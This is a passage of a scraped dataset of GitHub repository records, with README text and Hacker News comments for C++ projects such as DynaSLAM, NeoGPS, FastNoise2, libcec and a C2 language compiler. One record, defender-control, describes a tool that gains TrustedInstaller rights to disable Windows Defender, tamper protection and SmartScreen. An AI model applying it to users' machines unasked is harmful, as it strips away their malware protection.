dual-quaternions (rotor/motor) to planes, points,\r\nand lines make sense. There is a surprising amount of uniformity in the algebra, which enables\r\nefficient implementation, a simple API, and reduced code size.\r\n\r\n## Performance Considerations\r\n\r\nIt is known that a \"better\" way to vectorize computation in general is to arrange the data in an SoA\r\nlayout to avoid unnecessary cross-lane arithmetic or unnecessary shuffling. PGA is unique in that\r\na given PGA multivector has a natural decomposition into 4 blocks of 4 floating-point quantities.\r\nFor the even sub-algebra (isomorphic to the space of dual-quaternions) also known as the _motor\r\nalgebra_, the geometric product can be densely packed and implemented efficiently using SSE.\r\n\r\n## References\r\n\r\nKlein is deeply indebted to several members of the GA community and their work. Beyond the works\r\ncited here, the author stands of the shoulders of giants (Felix _Klein_, Sophus Lie, Arthur Cayley,\r\nWilliam Rowan Hamilton, Julius Pl\u00fccker, and William Kingdon Clifford, among others).\r\n\r\n[1]\r\nGunn, Charles G. (2019).\r\nCourse notes Geometric Algebra for Computer Graphics, SIGGRAPH 2019.\r\n[arXiv link](https://arxiv.org/abs/2002.04509)\r\n\r\n[2]\r\nSteven De Keninck and Charles Gunn. (2019).\r\nSIGGRAPH 2019 Geometric Algebra Course.\r\n[youtube link](https://www.youtube.com/watch?v=tX4H_ctggYo)\r\n\r\n[3]\r\nLeo Dorst, Daniel Fontijne, Stephen Mann. (2007)\r\nGeometric Algebra for Computer Science.\r\nBurlington, MA: Morgan Kaufmann Publishers Inc.\r\n", "readme_type": "markdown", "hn_comments": "How do you write an article on skeletal animation, and have zero examples of what that skeletal animation looks like?Ninepoints is getting repeatedly rate-limited. He invites anyone with questions to ask questions in the Klein discord (https://discord.gg/gkbfnNy)Geometric algebra looks cool, and this library seems like exactly what is needed for graphics programmers to use it.What I'd really like to see is a comprehensive cheat sheet with formulas for common tasks in computer graphics with an absolute minimum of theory and jargon; even less than this article. Of course it's great to learn the theory too, but most people just call slerp in a quaternion library without learning the theory of quaternions. It should be possible to use a geometric algebra library in a similar way.Just a heads up - @ninepoints let me know he got rate limited and will answer as soon as allowed again ;)I'm the author of Klein and was surprised to see a sudden burst of traffic so I checked the usual suspects and ended up here :)My goals for authoring Klein was to provide a library for performing all manner of geometric operations using the language of Geometric Algebra. The benefits are that the formulism is exception-free (meaning, for example, parallel planes have a well-defined line of intersection, that projections to higher/lower grade entities make sense, etc), and works equally well on points, lines, and planes. Practitioners coming from robotics/animation will also find the entirety of the Lie algebra/group inside GA as well for smooth interpolation, etc.As a graphics engineer, I found most libraries out there unsuitable because of performance reasons. We're used to having nicely packed SIMD optimized quaternions for example. Klein fills this gap and (hopefully) in a manner where you can use it even if you don't understand the Geometric Algebra (yet!). Over time, I'd like to round out the documentation to explain the underlying theory, which I find unreasonably elegant and has shifted my thinking in the last few years.Let me know if you have any questions about Klein or geometric algebra!It would be nice to see a demo that compares the two methods of interpolation of the movements.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "BertaBescos/DynaSLAM", "link": "https://github.com/BertaBescos/DynaSLAM", "tags": ["slam", "dynamic", "rgb-d", "monocular", "stereo", "inpainting"], "stars": 642, "description": "DynaSLAM is a SLAM system robust in dynamic environments for monocular, stereo and RGB-D setups", "lang": "C++", "repo_lang": "", "readme": "# DynaSLAM\n\n[[Project]](https://bertabescos.github.io/DynaSLAM/) [[arXiv]](https://arxiv.org/abs/1806.05620) [[Journal]](https://ieeexplore.ieee.org/document/8421015)\n\nDynaSLAM is a visual SLAM system that is robust in dynamic scenarios for monocular, stereo and RGB-D configurations. Having a static map of the scene allows inpainting the frame background that has been occluded by such dynamic objects.\n\n\n\nDynaSLAM: Tracking, Mapping and Inpainting in Dynamic Scenes \n[Berta Bescos](http://bertabescos.github.io), [Jos\u00e9 M. F\u00e1cil](http://webdiis.unizar.es/~jmfacil/), [Javier Civera](http://webdiis.unizar.es/~jcivera/) and [Jos\u00e9 Neira](http://webdiis.unizar.es/~jneira/) \nRA-L and IROS, 2018\n\nWe provide examples to run the SLAM system in the [TUM dataset](http://projects.asl.ethz.ch/datasets/doku.php?id=kmavvisualinertialdatasets) as RGB-D or monocular, and in the [KITTI dataset](http://www.cvlibs.net/datasets/kitti/eval_odometry.php) as stereo or monocular.\n\n## News\n- DynaSLAM supports now both OpenCV 2.X and OpenCV 3.X.\n\n## Getting Started\n- Install ORB-SLAM2 prerequisites: C++11 or C++0x Compiler, Pangolin, OpenCV and Eigen3 (https://github.com/raulmur/ORB_SLAM2).\n- Install boost libraries with the command `sudo apt-get install libboost-all-dev`.\n- Install python 2.7, keras and tensorflow, and download the `mask_rcnn_coco.h5` model from this GitHub repository: https://github.com/matterport/Mask_RCNN/releases. \n- Clone this repo:\n```bash\ngit clone https://github.com/BertaBescos/DynaSLAM.git\ncd DynaSLAM\n```\n```\ncd DynaSLAM\nchmod +x build.sh\n./build.sh\n```\n- Place the `mask_rcnn_coco.h5` model in the folder `DynaSLAM/src/python/`.\n\n## RGB-D Example on TUM Dataset\n- Download a sequence from http://vision.in.tum.de/data/datasets/rgbd-dataset/download and uncompress it.\n\n- Associate RGB images and depth images executing the python script [associate.py](http://vision.in.tum.de/data/datasets/rgbd-dataset/tools):\n\n ```\n python associate.py PATH_TO_SEQUENCE/rgb.txt PATH_TO_SEQUENCE/depth.txt > associations.txt\n ```\nThese associations files are given in the folder `./Examples/RGB-D/associations/` for the TUM dynamic sequences.\n\n- Execute the following command. Change `TUMX.yaml` to TUM1.yaml,TUM2.yaml or TUM3.yaml for freiburg1, freiburg2 and freiburg3 sequences respectively. Change `PATH_TO_SEQUENCE_FOLDER` to the uncompressed sequence folder. Change `ASSOCIATIONS_FILE` to the path to the corresponding associations file. `PATH_TO_MASKS` and `PATH_TO_OUTPUT` are optional parameters.\n\n ```\n ./Examples/RGB-D/rgbd_tum Vocabulary/ORBvoc.txt Examples/RGB-D/TUMX.yaml PATH_TO_SEQUENCE_FOLDER ASSOCIATIONS_FILE (PATH_TO_MASKS) (PATH_TO_OUTPUT)\n ```\n \nIf `PATH_TO_MASKS` and `PATH_TO_OUTPUT` are **not** provided, only the geometrical approach is used to detect dynamic objects. \n\nIf `PATH_TO_MASKS` is provided, Mask R-CNN is used to segment the potential dynamic content of every frame. These masks are saved in the provided folder `PATH_TO_MASKS`. If this argument is `no_save`, the masks are used but not saved. If it finds the Mask R-CNN computed dynamic masks in `PATH_TO_MASKS`, it uses them but does not compute them again.\n\nIf `PATH_TO_OUTPUT` is provided, the inpainted frames are computed and saved in `PATH_TO_OUTPUT`.\n\n## Stereo Example on KITTI Dataset\n- Download the dataset (grayscale images) from http://www.cvlibs.net/datasets/kitti/eval_odometry.php \n\n- Execute the following command. Change `KITTIX.yaml`to KITTI00-02.yaml, KITTI03.yaml or KITTI04-12.yaml for sequence 0 to 2, 3, and 4 to 12 respectively. Change `PATH_TO_DATASET_FOLDER` to the uncompressed dataset folder. Change `SEQUENCE_NUMBER` to 00, 01, 02,.., 11. By providing the last argument `PATH_TO_MASKS`, dynamic objects are detected with Mask R-CNN.\n```\n./Examples/Stereo/stereo_kitti Vocabulary/ORBvoc.txt Examples/Stereo/KITTIX.yaml PATH_TO_DATASET_FOLDER/dataset/sequences/SEQUENCE_NUMBER (PATH_TO_MASKS)\n```\n\n## Monocular Example on TUM Dataset\n- Download a sequence from http://vision.in.tum.de/data/datasets/rgbd-dataset/download and uncompress it.\n\n- Execute the following command. Change `TUMX.yaml` to TUM1.yaml,TUM2.yaml or TUM3.yaml for freiburg1, freiburg2 and freiburg3 sequences respectively. Change `PATH_TO_SEQUENCE_FOLDER`to the uncompressed sequence folder. By providing the last argument `PATH_TO_MASKS`, dynamic objects are detected with Mask R-CNN.\n```\n./Examples/Monocular/mono_tum Vocabulary/ORBvoc.txt Examples/Monocular/TUMX.yaml PATH_TO_SEQUENCE_FOLDER (PATH_TO_MASKS)\n```\n\n## Monocular Example on KITTI Dataset\n- Download the dataset (grayscale images) from http://www.cvlibs.net/datasets/kitti/eval_odometry.php \n\n- Execute the following command. Change `KITTIX.yaml`by KITTI00-02.yaml, KITTI03.yaml or KITTI04-12.yaml for sequence 0 to 2, 3, and 4 to 12 respectively. Change `PATH_TO_DATASET_FOLDER` to the uncompressed dataset folder. Change `SEQUENCE_NUMBER` to 00, 01, 02,.., 11. By providing the last argument `PATH_TO_MASKS`, dynamic objects are detected with Mask R-CNN.\n```\n./Examples/Monocular/mono_kitti Vocabulary/ORBvoc.txt Examples/Monocular/KITTIX.yaml PATH_TO_DATASET_FOLDER/dataset/sequences/SEQUENCE_NUMBER (PATH_TO_MASKS)\n```\n\n\n## Citation\n\nIf you use DynaSLAM in an academic work, please cite:\n\n @article{bescos2018dynaslam,\n title={{DynaSLAM}: Tracking, Mapping and Inpainting in Dynamic Environments},\n author={Bescos, Berta, F\\'acil, JM., Civera, Javier and Neira, Jos\\'e},\n journal={IEEE RA-L},\n year={2018}\n }\n\n## Acknowledgements\nOur code builds on [ORB-SLAM2](https://github.com/raulmur/ORB_SLAM2).\n\n# DynaSLAM\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SlashDevin/NeoGPS", "link": "https://github.com/SlashDevin/NeoGPS", "tags": ["gps", "nmea", "arduino"], "stars": 642, "description": "NMEA and ublox GPS parser for Arduino, configurable to use as few as 10 bytes of RAM", "lang": "C++", "repo_lang": "", "readme": "NeoGPS\n======\n\nThis fully-configurable Arduino library uses _**minimal**_ RAM, PROGMEM and CPU time, \nrequiring as few as _**10 bytes of RAM**_, **866 bytes of PROGMEM**, and **less than 1mS of CPU time** per sentence. \n\nIt supports the following protocols and messages:\n\n#### NMEA 0183\n* GPGGA - System fix data\n* GPGLL - Geographic Latitude and Longitude\n* GPGSA - DOP and active satellites\n* GPGST - Pseudo Range Error Statistics\n* GPGSV - Satellites in View\n* GPRMC - Recommended Minimum specific GPS/Transit data\n* GPVTG - Course over ground and Ground speed\n* GPZDA - UTC Time and Date\n\nThe \"GP\" prefix usually indicates an original [GPS](https://en.wikipedia.org/wiki/Satellite_navigation#GPS) source. NeoGPS parses *all* Talker IDs, including\n * \"GL\" ([GLONASS](https://en.wikipedia.org/wiki/Satellite_navigation#GLONASS)),\n * \"BD\" or \"GB\" ([BeiDou](https://en.wikipedia.org/wiki/Satellite_navigation#BeiDou)),\n * \"GA\" ([Galileo](https://en.wikipedia.org/wiki/Satellite_navigation#Galileo)), and\n * \"GN\" (mixed)\n\nThis means that GLRMC, GBRMC or BDRMC, GARMC and GNRMC from the latest GPS devices (e.g., ublox M8N) will also be correctly parsed. See discussion of Talker IDs in [Configurations](extras/doc/Configurations.md#enabledisable-the-talker-id-and-manufacturer-id-processing).\n\nMost applications can be fully implemented with the standard NMEA messages above. They are supported by almost all GPS manufacturers. Additional messages can be added through derived classes (see ublox and Garmin sections below).\n\nMost applications will use this simple, familiar loop structure:\n```\nNMEAGPS gps;\ngps_fix fix;\n\nvoid loop()\n{\n while (gps.available( gps_port )) {\n fix = gps.read();\n doSomeWork( fix );\n }\n}\n```\nFor more information on this loop, see the [Usage](extras/doc/Data%20Model.md#usage) section on the [Data Model](extras/doc/Data%20Model.md) page.\n\n(This is the plain Arduino version of the [CosaGPS](https://github.com/SlashDevin/CosaGPS) library for [Cosa](https://github.com/mikaelpatel/Cosa).)\n\nGoals\n======\nIn an attempt to be reusable in a variety of different programming styles, this library supports:\n* resource-constrained environments (e.g., ATTINY targets)\n* sync or async operation (reading in `loop()` vs interrupt processing)\n* event or polling (deferred handling vs. continuous calls in `loop()`)\n* coherent fixes (merged from multiple sentences) vs. individual sentences\n* optional buffering of fixes\n* optional floating point\n* configurable message sets, including hooks for implementing proprietary NMEA messages\n* configurable message fields\n* multiple protocols from same device\n* any kind of input stream (Serial, [NeoSWSerial](https://github.com/SlashDevin/NeoSWSerial), I2C, PROGMEM arrays, etc.)\n\nInconceivable!\n=============\n\nDon't believe it? Check out these detailed sections:\n\nSection | Description\n-------- | ------------\n[License](LICENSE) | The Fine Print\n[Installing](extras/doc/Installing.md) | Copying files\n[Data Model](extras/doc/Data%20Model.md) | How to parse and use GPS data\n[Configurations](extras/doc/Configurations.md) | Tailoring NeoGPS to your needs\n[Performance](extras/doc/Performance.md) | 37% to 72% faster! Really!\n[RAM requirements](extras/doc/RAM.md) | Doing it without buffers!\n[Program Space requirements](extras/doc/Program.md) | Making it fit\n[Examples](extras/doc/Examples.md) | Programming styles\n[Troubleshooting](extras/doc/Troubleshooting.md) | Troubleshooting\n[Extending NeoGPS](extras/doc/Extending.md) | Using specific devices\n[ublox](extras/doc/ublox.md) | ublox-specific code\n[Garmin](extras/doc/Garmin.md) | Garmin-specific code\n[Tradeoffs](extras/doc/Tradeoffs.md) | Comparing to other libraries\n[Acknowledgements](extras/doc/Acknowledgements.md) | Thanks!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pplonski/keras2cpp", "link": "https://github.com/pplonski/keras2cpp", "tags": ["neural-network", "keras", "machine-learning"], "stars": 642, "description": "This is a bunch of code to port Keras neural network model into pure C++.", "lang": "C++", "repo_lang": "", "readme": "# keras2cpp\n\nThis is a bunch of code to port Keras neural network model into pure C++. Neural network weights and architecture are stored in plain text file and input is presented as `vector > >` in case of image. The code is prepared to support simple Convolutional network (from MNIST example) but can be easily extended. There are implemented only ReLU and Softmax activations.\n\nIt is working with the Theano backend.\n\n## Usage\n\n 1. Save your network weights and architecture.\n 2. Dump network structure to plain text file with `dump_to_simple_cpp.py` script.\n 3. Use network with code from `keras_model.h` and `keras_model.cc` files - see example below.\n\n## Example\n\n 1. Run one iteration of simple CNN on MNIST data with `example/mnist_cnn_one_iteration.py` script. It will produce files with architecture `example/my_nn_arch.json` and weights in HDF5 format `example/my_nn_weights.h5`.\n 2. Dump network to plain text file `python dump_to_simple_cpp.py -a example/my_nn_arch.json -w example/my_nn_weights.h5 -o example/dumped.nnet`.\n 3. Compile example `g++ -std=c++11 keras_model.cc example_main.cc` - see code in `example_main.cc`.\n 4. Run binary `./a.out` - you shoul get the same output as in step one from Keras.\n\n## Testing\n\nIf you want to test dumping for your network, please use `test_run.sh` script. Please provide there your network architecture and weights. The script do following job:\n\n 1. Dump network into text file.\n 2. Generate random sample.\n 3. Compute predictions from keras and keras2cpp on generated sample.\n 4. Compare predictions.\n\n## Similar repositories\n\n- Keras to C++ with usage of Tensorflow C API https://github.com/aljabr0/from-keras-to-c\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Auburn/FastNoise2", "link": "https://github.com/Auburn/FastNoise2", "tags": ["noise", "noise-generator", "noise-algorithms", "simplex", "perlin-noise", "node-graph", "fastnoise", "cross-platform", "terrain-generation", "texture-generation", "simd", "procedural-generation", "magnum"], "stars": 642, "description": "Modular node graph based noise generation library using SIMD, C++17 and templates", "lang": "C++", "repo_lang": "", "readme": "[![GitHub Actions CI](https://img.shields.io/github/workflow/status/Auburn/FastNoise2/CI?style=flat-square&logo=GitHub \"GitHub Actions CI\")](https://github.com/Auburn/FastNoise2/actions?query=workflow%3ACI)\n[![Discord](https://img.shields.io/discord/703636892901441577?style=flat-square&logo=discord \"Discord\")](https://discord.gg/SHVaVfV)\n\n# FastNoise2\n\nWIP successor to [FastNoiseSIMD](https://github.com/Auburn/FastNoiseSIMD)\n\nModular node based noise generation library using SIMD, modern C++17 and templates\n\nFastNoise2 is a fully featured noise generation library which aims to meet all your coherent noise needs while being extremely fast\n\nUses FastSIMD to compile classes with multiple SIMD types and selects the fastest supported SIMD level at runtime\n- Scalar (non-SIMD)\n- SSE2\n- SSE4.1\n- AVX2\n- AVX512\n- NEON\n\nSupports:\n- 32/64 bit\n- Windows\n- Linux\n- Android\n- MacOS\n- MSVC\n- Clang\n- GCC\n\nBindings:\n- [C#](https://github.com/Auburn/FastNoise2Bindings)\n- [Unreal Engine CMake](https://github.com/caseymcc/UE4_FastNoise2)\n- [Unreal Engine Blueprint](https://github.com/DoubleDeez/UnrealFastNoise2)\n\nRoadmap:\n- [Vague collection of ideas](https://github.com/users/Auburn/projects/1)\n\n## Noise Tool\n\nThe FastNoise2 noise tool provides a node graph editor to create trees of FastNoise2 nodes. Node trees can be exported as serialised strings and loaded into the FastNoise2 library in your own code. The noise tool has 2D and 3D previews for the node graph output, see screenshots below for examples.\n\nCheck the [Releases](https://github.com/Auburn/FastNoise2/releases/latest) for compiled NoiseTool binaries\n\n![NoiseTool](https://user-images.githubusercontent.com/1349548/90967950-4e8da600-e4de-11ea-902a-94e72cb86481.png)\n\n## Performance\n\nFastNoise2 has continuous benchmarking to track of performance for each node type across commits\n\nResults can be found here: https://auburn.github.io/fastnoise2benchmarking/\n\n### Library Comparisons\n\nBenchmarked using [NoiseBenchmarking](https://github.com/Auburn/NoiseBenchmarking)\n\n- CPU: Intel 7820X @ 4.9Ghz\n- OS: Win10 x64\n- Compiler: clang-cl 10.0.0 -m64 /O2\n\nMillion points of noise generated per second (higher = better)\n\n| 3D | Value | Perlin | (*Open)Simplex | Cellular |\n|--------------------|--------|--------|----------------|----------|\n| FastNoise Lite | 64.13 | 47.93 | 36.83* | 12.49 |\n| FastNoise (Legacy) | 49.34 | 37.75 | 44.74 | 13.27 |\n| FastNoise2 (AVX2) | 494.49 | 261.10 | 268.44 | 52.43 |\n| libnoise | | 27.35 | | 0.65 |\n| stb perlin | | 34.32 | | |\n\n| 2D | Value | Perlin | Simplex | Cellular |\n|--------------------|--------|--------|---------|----------|\n| FastNoise Lite | 114.01 | 92.83 | 71.30 | 39.15 |\n| FastNoise (Legacy) | 102.12 | 87.99 | 65.29 | 36.84 |\n| FastNoise2 (AVX2) | 776.33 | 624.27 | 466.03 | 194.30 |\n\n# Getting Started\n\nSee [documentation](https://github.com/Auburn/FastNoise2/wiki)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Pulse-Eight/libcec", "link": "https://github.com/Pulse-Eight/libcec", "tags": [], "stars": 642, "description": " USB CEC Adapter communication Library http://libcec.pulse-eight.com/", "lang": "C++", "repo_lang": "", "readme": "![Pulse-Eight logo](https://pulseeight.files.wordpress.com/2016/02/pulse-eight-logo-white-on-green.png?w=200)\n\n# About\nThis library provides support for Pulse-Eight's USB-CEC adapter and other CEC capable hardware, like the Raspberry Pi.\n\nA list of FAQ (Frequently Asked Questions) can be found on [libCEC's FAQ page](http://libcec.pulse-eight.com/faq).\n\n.Net client applications, previously part of this repository, have been moved to [this repository](https://github.com/Pulse-Eight/cec-dotnet).\n\n# Supported platforms\n\n## Linux & BSD\nSee [docs/README.linux.md](docs/README.linux.md).\n\n## Apple OS X\nSee [docs/README.osx.md](docs/README.osx.md).\n\n## Microsoft Windows\nSee [docs/README.windows.md](docs/README.windows.md).\n\n# Supported hardware\n* [Pulse-Eight USB-CEC Adapter](https://www.pulse-eight.com/p/104/usb-hdmi-cec-adapter)\n* [Pulse-Eight Intel NUC CEC Adapter](https://www.pulse-eight.com/p/154/intel-nuc-hdmi-cec-adapter)\n* [Pulse-Eight CEC Adapter for Skull Canyon and Hades Canyon NUC systems](https://www.pulse-eight.com/p/207/skull-canyon-nuc-cec-adapter)\n* [Raspberry Pi](https://www.raspberrypi.org/)\n* Some Exynos SoCs\n* NXP TDA995x\n* Odroid C2 (Amlogic S905)\n\n# Developers\nSee [docs/README.developers.md](docs/README.developers.md).\n\n# Vendor specific notes\n\n## Panasonic\n* On Panasonic to enable media control buttons on bottom of the remote, you may have to change the operation mode. To change it, press bottom Power-button, keep it pressed, and press 7 3 Stop. After releasing Power-button, Play, Pause, etc should work in XBMC.\n\n## Raspberry Pi\n* If your TV cannot detect the Raspberry Pi's CEC, or if the the Pi can't detect the TV, try adding the following line in `/boot/config.txt` and reboot the Pi: `hdmi_force_hotplug=1`\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "qtkite/defender-control", "link": "https://github.com/qtkite/defender-control", "tags": ["windows", "defender"], "stars": 642, "description": "An open-source windows defender manager. Now you can disable windows defender permanently. ", "lang": "C++", "repo_lang": "", "readme": "# Defender Control\r\nOpen source windows defender disabler. \r\nNow you can disable windows defender permanently! \r\nTested from Windows 10 20H2. \r\nAlso working on Windows 11* \r\n\r\n## What is this project? \r\nWe all know that disabling windefender is very difficult since microsoft is constantly enforcing changes. \r\nThe first solution is to install an anti-virus - but thats not the point if we are trying to disable it! \r\nThe next easiest solution is to use freeware thats already available on the internet - but none of them are native & open source... \r\nI like open source, so I made a safe to use open source defender control. \r\n\r\n## On windows updates / Windows 11\r\nSometimes windows decides to update and turn itself back on. \r\nA common issue is that defender control sometimes doesn't want to disable tamper protection again. \r\nPlease try turning off tamper protection manually then running disable-defender.exe again before posting an issue. \r\n\r\n![Tamper](https://github.com/qtkite/defender-control/blob/main/resources/tamper.png?raw=true)\r\n\r\n## What does it do?\r\n1. It gains TrustedInstaller permissions\r\n2. It will disable windefender services + smartscreen\r\n3. It will disable anti-tamper protection\r\n4. It will disable all relevant registries + wmi settings\r\n\r\n## Is it safe?\r\nYes it is safe, feel free to review the code in the repository yourself. \r\nAnti-virus & other programs might flag this as malicious since it disables defender - but feel free to compile it using visual studio.\r\n\r\n## Compiling\r\nOpen the project using visual studio 2022 preview. \r\nSet the build to Release and x64. \r\nChange the build type you want in settings.hpp. \r\nCompile. \r\n\r\n## Demo\r\n![Demo](https://github.com/qtkite/defender-control/blob/main/resources/demo.gif?raw=true)\r\n\r\n## Release\r\nYou can find the first release over at the releases on the right. \r\nOr alternatively click [here](https://github.com/qtkite/defender-control/releases/tag/v1.2).\r\n\r\n## Windows 11\r\nWorks for earlier versions of Windows 11. Correct registries have not been added yet for the latest version.\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "c2lang/c2compiler", "link": "https://github.com/c2lang/c2compiler", "tags": ["programming-language", "c", "c2", "compiler"], "stars": 641, "description": "the c2 programming language", "lang": "C++", "repo_lang": "", "readme": "# C2Compiler\n\nPlease see [C2Lang.org](http://c2lang.org) for more info about C2!\n\nThe C2 project attempts to create a new language, strongly based on C.\nIn a nutshell, the main differences with C are:\n* no more header files (too much typing)\n* no includes\n* packages (needed if we can't have includes)\n* compiled per target (not per file)\n* more logical keywords (public/local replaces static)\n* integrated build system\n\nBelow are the instructions for building and using the C2Compiler.\n\nHave fun! (and code..)\n\n\n## Generic\nC2 is based on LLVM 7.0 and some parts of Clang 7.0. The design of C2C's\nParser and ASTBuilder classes are heavily based on clang's Parser and Sema class,\nso hereby my thanks to the Clang folks!\n\n\n## What needs to be done\nA short list of open items (the full list would probably fill-up GitHub) with\ntheir priority:\n* [high] c2c: parse full syntax into AST (ALMOST DONE)\n* [high] c2c: generate IR code for more AST elements\n* [medium] tool: create graphical refactor tool (c2reto) (IN PROGRESS)\n* [medium] c2c: tab completion on targets in recipe / cmdline args\n* [medium] tool: create c-parser for parsing C headers.\n* [medium] tool: create c2format - astyle for C2.\n* [low] tool: c2grep - grep only files in recipe\n\n\n## Installation\nRead the [installation document](INSTALL.md) for installation on Linux or OSX. For\nWindows installation, see [windows installation document](INSTALL_WIN.md).\n\n## Using the C2 compiler\nBy default, c2c will only parse and analyse the targets. Generating C-code\nshould work on all examples, but generating LLVM's IR code is work in\nprogress. In the examples directory: (or add -d examples/)\n```\nc2c multi\nc2c hello\nc2c puzzle\nc2c -I working_ir\n```\n\nIt's also possible to manually compile a single .c2 file without a recipe\nfile with:\n```\nc2c -f \n```\n\nTo generate ANSI-C code, use:\n```\nc2c -C \n```\n\nThe C2 compiler is able to generate a package dependency file in dot format. This\nfile can be converted into a png as follows:\n```\nc2c --deps \ndot -T png output/target/deps.dot > image.png\n```\n\nTo see all available options, run:\n```\nc2c -h\n```\n## c2tags\n**c2tags** is C2's version of ctags. This tool is used by vim (e.a.) to \"jump to\ndefinition\". See the [installation document](INSTALL.md) on how to install.\n\nHow it works is as follows:\n* use --refs or add $refs in recipe.txt to generate **refs** file during compilation.\n* c2c generates a **refs** file per target. This file contains all references\n and their respective destinations.\n* c2tags currently doesn't have a full-blown vim-plugin yet, but a small\n code-fragment in your .vimrc should suffice.\n* Pressing ctrl-h (configurable) with your cursor on any symbol\n will jump to its definition. Pressing ctrl-o (default) will jump back.\n\nJust like **c2c** itself, **c2tags** can be called from any (sub)directory in the\nproject tree.\n\n", "readme_type": "markdown", "hn_comments": "For a while now I have wondered if compiling an average Linux system with AOCC, AMD's Optimized C/C++ Compiler would have a noticeable effect for a system using one of AMD's APUs.In the libreoffice project, we have implemented some of this eg. no c style casts, using clang plugins, which avoids needing a custom build of clang. But always good to see people experimenting in this space!All non-void return values should be [[nodiscard]] by default. Of course then you will need something else ([[discardable]]?) to indicate the ones that may safely be ignored.I really do not understand the Rust-esque love of the \"mutable\" keyword in rebellion of \"const\". They are most often attached to variables. The definition of the word variable is \"subject to variation or changes\". By definition, variables change. Constants do not change. I understand that the semantics here are historical, but it's very much like \"Automated ATM Machine\". Maybe I just don't like the word mutable, and would prefer \"var\" or \"varying\".I'm not sure about explicit braces for cases in `switch`. I think what Swift does is pretty neat: each case breaks by default, so you don't have to write `break;`, instead you have to write `fallthrough` to explicitly allow them falling through.One suggestion: In documentation and comments, distinguish clearly between \"const\" and \"constant\".\"const\" means \"read-only\", and probably should have been spelled \"readonly\".\"constant\", as in \"constant expression\", means evaluated at compile time.For example: `const int r = rand();` is perfectly valid: r can't be computed until run time (it's not constant), but it can't be modified after its initialization (it is const/readonly).> - All basic types (excluding pointers and references) are const by\n default and may be marked 'mutable' to allow them to be changed after\n declarationIf you're not changing how const works, then this has limited utility in C++ because C++ const has all sorts of problems (e.g. not transitive). Also, what does the \"mutable\" annotation for a free function (i.e. main) mean? That just seems weird.> - Lambda capture lists must be explicit (no [&] or [=], by themselves)[&] is pretty valuable in cases where you do something like invokeSynchronously([&] {...})I don't know that your changes will ever see much adoption because it won't be able to compile anything more complex than a \"hello world\" program as all the things you disallow are used & the porting effort is not cosmetic. Additionally, you're not actually fixing any of the problems people have with C++. So:1. Consider fixing const semantics if you're going down the path of defining a new language2. Think about how to fix memory safety and issues around UB which are the #1 sharp edges for C++I don't know if you're achieving the goal of a safer, less error-prone language with the changes outlined. Have you looked at the things Carbon [1] is doing? I'd say that's an attempt to define a spiritual successor to C++, one that can easily interoperate with C++ but when you stay within the language it's safer.[1] https://github.com/carbon-language/carbon-langApart from the mutable keyword, can't these be implemented as a clang diagnostic plugin? Then it can be used to enforce a stricter style guide. As another commenter pointed, mutable will be probably of limited use anyway.This is a really great idea, specially if you can write a transpiler from general C++ into modified C++ (it can error out on corner cases and ask for manual intervention, but trivial stuff like adding missing braces can and should be done by an automatic tool, like rustfix is used to migrate between Rust editions https://github.com/rust-lang/rustfix)But here you didn't tackle the main thing: a plan to make simple business logic not corrupt memory and cause havok with UB! Dereferencing arbitrary pointers is a dangerous operation that shouldn't be done in everyday code. If I'm writing data structures I'm willing to think about UB, but if I'm choosing the color of a widget I'm less so. I'm not expecting you solve this hard problem, but at least a general direction or a half solution that works for a % of the cases would be cool (or at least state this is a long term goal).And of course there's the comparison to Rust, but Rust is actually just a data point in this solution space and perhaps new languages can afford to try new approachesWithout an Issue tracker on the GH fork it will be hard to add ideas.I would add: removing Unicode identifiers, because identifiers are meant to be identifiable.what's the motivation for removing `goto`, is this something that you find being abused? I code in c++ for work, and I almost never see anyone using it without a good reason.Could you please write a translator, that would convert into the modified syntax instead of emitting an error?Add something like a break_n/break_label that allows for leaving a loop from a switch statement. Or allow goto in that limited case.const-by-default is definitely nice. Does this extend to both sides of a pointer type? Does int * refer to int const * const?There is nothing wrong with [&] for short-lifetime lambdas. Lambdas passed to std algorithms or immediately invoked lambdas come to mind.edit:Are data members also const by default? How do I declare a non-const data member that is const when accessed within a const member function? (so non-const non-mutable in original c++)Ok some more suggestions:\n- Pointers aren't arrays.\n- no implicit conversions at all.\n- require fields to be initialized before use/end of constructorI think you might be onto something with regards to the general idea, but most of your particular rules I disagree with. vector for example is very strange; there's no reason vector shouldn't work. With respect to lambda captures always being explicit, it's a far heavier restriction than you (and many) people realize\u2014sometimes you literally cannot know what's inside the lambda to be able to capture it (look up the SCOPE_EXIT macro as just one example), and even when you can, listing all of them is sometimes far more harmful to readability than helpful\u2014it depends strongly on the situation. Goto is absolutely necessary in certain rare but practical cases too\u2014like when converting a recursive algorithm to an iterative one without breaking git blame. C-style casts to (void) are pretty useful, so you'd need at least an exception for that.Constructors being explicit by default I 100% agree with, and there are other rules I could come up with too, but in general, you need to realize that a lot of the features in the language have legitimate use cases that you might simply have a hard time imagining. Therefore, coming up with useful rules without hampering useful functionality requires both (a) experience & playing around with the language to a greater extent than you might at your job, and (b) a great deal of thought on top of that.How about making atomics mutable through const&, adding move-by-default, and marking all constructors (value, conversion, and copy) as explicit aside from move, and probably add explicit copy assignment as well?> All basic types (excluding pointers and references) are const by\ndefault and may be marked 'mutable' to allow them to be changed after\ndeclarationFWIW, for me, this is an anti-feature, and I would not use this language because of it. The net effect of this would be that I type \"mutable\" all over the place and get very little for my effort.I've spent a significant amount of time understanding what the high-consequence programming errors that I make are, and \"oops, I mutated that thing that I could have marked const\" is a class of error that consumes a vanishingly small amount of my debugging time.The errors I make that account for a large portion of my debugging time are errors related to semantics of my program. Things that, in C++, are typically only detectable at runtime, but with a better type system could be detected at compile time. The first step for this might be type annotations that specify valid values. For example, being able to annotate whether an argument is or is not allowed to be null, and having that enforced at call sites.(NOTE: I also don't spend a meaningful amount of time debugging accidental 